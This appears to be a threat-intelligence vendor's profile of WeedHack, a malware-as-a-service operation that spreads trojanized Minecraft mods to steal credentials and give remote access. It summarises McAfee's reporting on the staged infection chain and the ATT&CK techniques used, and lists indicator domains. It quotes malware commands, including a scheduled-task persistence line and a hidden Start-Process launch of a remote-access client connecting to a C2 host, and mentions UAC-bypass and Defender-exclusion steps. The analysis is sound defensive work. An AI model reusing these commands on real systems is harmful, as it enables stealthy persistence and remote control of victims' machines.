WeedHack
WeedHack is a Minecraft-focused malware-as-a-service (MaaS) operation active since at least January 2026 that targets Minecraft players by disguising malware as mods, clients, cheats, and related utilities. It has been distributed primarily through YouTube-promoted downloads and search-engine poisoning, using fake Minecraft-themed sites and trojanized JAR files; reporting cited more than 240 distribution URLs, 3,820 unique malicious JAR files, and approximately 116,464 impacted systems, with the highest prevalence in the United States, Germany, India, and the United Kingdom.
The platform is hosted on the clear net and provides a dashboard for operators or customers to view stolen data, monitor victims, and build payloads. The free tier functions as an infostealer, stealing Minecraft session IDs, browser cookies and saved passwords, credentials from Discord, Steam, and Telegram, and cryptocurrency wallet data; reporting also states it targets 36 browsers, 56 browser-based crypto wallets, and 12 desktop crypto wallets, and can capture screenshots. The premium tier, advertised at $5 per month or $24.99 lifetime, adds remote-access capabilities including screen sharing and remote control, webcam access, keylogging, reverse shell execution, and file upload/download or file-management functions.
McAfee reporting describes a multi-stage infection chain. Stage 1 is delivered as malicious Minecraft-themed Java archives and relaunches via javaw.exe, reads an identifier from fabric.api.json, decrypts Ethereum JSON-RPC endpoints, and uses EtherHiding to retrieve current C2 information, verifying RSA-signed responses before downloading the next stage. Stage 2 uses JNIC obfuscation, performs a CMSTP-based UAC bypass, adds Windows Defender exclusions, performs reconnaissance, steals browser and Discord data, and downloads Stage 3. Stage 3 establishes persistence via a registry Run key and scheduled task, expands Defender exclusions, and downloads Stage 4. Stage 4 deploys Windows payloads including RuntimeBroker.exe for remote desktop and webcam access, Telemetry.exe as an infostealer targeting Telegram and cryptocurrency wallet data, and chromedriver.dll as a browser credential stealer; associated scripts include WinDefConfig.cmd for Defender exclusions, Updater.vbs for persistence, and elv.vbs for UAC bypass.
Known infrastructure and indicators mentioned in the reporting include dashboard or related domains such as weedhack.to, whpayment.ru, whack.cy, whtempdomain.com, whreceiverrrrrrrrr.ru, whrc.ru, whnewreceive.ru, and weedhack.xyz; telemetrydata.to as a destination for stolen data; the Telegram channel hxxps://t.me/+pw_g24ajDcQwMmYy; and McAfee detections including Trojan:Win/Weedhack.AA, Trojan:Win/Weedhack.AB, Trojan:Win/Weedhack.AC, Trojan:Win/Weedhack.AD, Trojan:Win/Weedhack.AE, and Trojan:Script/Weedhack.AF. Reporting also notes many apparent customers were teenagers or young adults using the malware for account theft, harassment, monitoring, and cyberbullying.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueThe WeedHack malware is distributed through malicious Minecraft-related mods, clients, and utilities promoted via YouTube and search engine poisoning.
Initial Access
1 techniqueThese videos target specific Minecraft keywords and place download links in both the description and in the comment section for more visibility.
Execution
6 techniquesThen it creates a scheduled task entry using this command. schtasks /Create /TN “JavaSecurityUpdater” /SC ONLOGON /TR “C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\Updater.vbs” /RL HIGHEST /IT /F
WeedHack also offers a premium tier for $5/month... that adds remote control with input access (mouse and keyboard), webcam access, keylogger, remote shell, and remote file management.
Start-Process -FilePath ‘C:\Users\admin\AppData\Roaming\RuntimeBroker.exe’ -ArgumentList ‘–server wss://remotev2.whpayment.ru/ws/client ...’ -WindowStyle Hidden
Next, the malware drops and executes ‘WinDefConfig.cmd’ from the temp folder.
This instruction executes a VBS script ... which silently relaunches the Stage 2 payload via ‘javaw.exe’
The WeedHack malware is distributed through malicious Minecraft-related mods, clients, and utilities... The campaign utilizes over 240 distribution URLs and 3,820 unique malicious JAR files.
Persistence
3 techniquesThen it creates a scheduled task entry using this command. schtasks /Create /TN “JavaSecurityUpdater” /SC ONLOGON /TR “C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\Updater.vbs” /RL HIGHEST /IT /F
This jar file creates a run key registry entry using the following code.
Privilege Escalation
2 techniquesThen it creates a scheduled task entry using this command. schtasks /Create /TN “JavaSecurityUpdater” /SC ONLOGON /TR “C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\Updater.vbs” /RL HIGHEST /IT /F
Stealth
3 techniquesStage 2 and the subsequent JAR payloads, namely Stage 3 and Stage 4, are protected using JNIC... This tool also provides a strong string obfuscation feature, which is also used by Weedhack to hinder analysis.
Weedhack has been active since January 2026 and masquerades as genuine Minecraft clients and mods to infect users.
Next, the malware performs the UAC bypass by leveraging CMSTP. It creates the following Windows INF installation script in the temp folder and executes it via “cmstp.exe”.
Defense Impairment
1 techniqueCredential Access
3 techniquesA premium tier, available for $5 per month or a $24.99 lifetime purchase, adds features like remote control, webcam access, and keylogging.
The MaaS platform, hosted on the clear net, offers a free tier that steals Minecraft session IDs, browser cookies, saved passwords, and credentials from various applications.
The MaaS platform, hosted on the clear net, offers a free tier that steals Minecraft session IDs, browser cookies, saved passwords, and credentials from various applications.
Discovery
3 techniquesThe next command ... is used to scan and display nearby Wi-Fi networks, which could allow threat actors to infer victim location and classify the network type.
The first set of commands ... are used to collect host information, namely the OS name, CPU and GPU details, and the total RAM.
It can search for files using 24 different keywords
Collection
3 techniquesA premium tier, available for $5 per month or a $24.99 lifetime purchase, adds features like remote control, webcam access, and keylogging.
Along with this, the sample takes a screenshot of the victim’s screen
A premium tier, available for $5 per month or a $24.99 lifetime purchase, adds features like remote control, webcam access, and keylogging.
Command and Control
5 techniquesThis sample is responsible for the remote desktop and webcam access ... Start-Process ... RuntimeBroker.exe ... ‘–server wss://remotev2.whpayment.ru/ws/client’
Recommendations for VPN and residential proxy services with setup instructions.
Once the signature is verified, the malware contacts the C2 server to fetch the Stage 2 payload. This payload is downloaded as raw bytes and is unpacked entirely in memory.
A premium tier, available for $5 per month or a $24.99 lifetime purchase, adds features like remote control, webcam access, and keylogging.
This campaign deploys EtherHiding, a technique that uses Ethereum blockchain to fetch its latest C2 domain.
Other
1 techniqueIOCs tracked for this family
118 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
WeedHack is a malware-as-a-service operation targeting Minecraft players via trojanized mods, clients, and utilities. Its free tier steals Minecraft session IDs, browser cookies, saved passwords, and credentials from applications, while its premium tier adds remote control, webcam access, and keylogging.
WeedHack is a multi-stage malware campaign distributed via trojanized JAR files, particularly masquerading as Minecraft-related mods/clients. The staged infection chain drops components including a remote access backdoor (RuntimeBroker.exe), an infostealer payload (Telemetry.exe), a browser credential stealer (chromedriver.dll), persistence and UAC-bypass scripts, and uses WeedHack-branded dashboard infrastructure for operator control.
WeedHack is a malware-as-a-service platform targeting Minecraft players via fake mods, cheats, clients, and tools. Its free version steals Minecraft sessions, browser cookies and saved passwords, cryptocurrency wallet data, and credentials from Discord, Steam, and Telegram, and can take screenshots. The paid version adds remote control, webcam access, keylogging, reverse shell, and file-management capabilities.
WeedHack is a malware-as-a-service platform targeting Minecraft users via malicious mods, clients, and utilities distributed through YouTube and SEO poisoning. Its free tier includes infostealing capabilities targeting Minecraft session IDs, browser credentials, cookies, cryptocurrency wallets, and messaging/gaming credentials, while premium tiers add remote-access features such as webcam access, keystroke logging, reverse shell execution, screen sharing, and file transfer.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.